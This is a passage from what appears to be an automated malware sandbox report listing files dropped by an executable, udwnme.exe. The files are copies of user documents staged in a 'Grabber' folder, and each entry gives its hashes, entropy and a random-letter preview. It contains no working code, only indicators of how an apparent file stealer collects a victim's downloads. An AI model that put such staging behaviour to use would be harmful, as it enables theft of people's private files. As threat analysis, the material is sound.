                                                                  SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                  SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                  SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                  Malicious:false
                                                                  Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\RAYHIWGKDI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\WUTJSCBCFX.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.688284131239007
                                                                  Encrypted:false
                                                                  SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                  MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                  SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                  SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                  SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                  Malicious:false
                                                                  Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\YPSIACHYXW.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZBEDCJPBEY.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
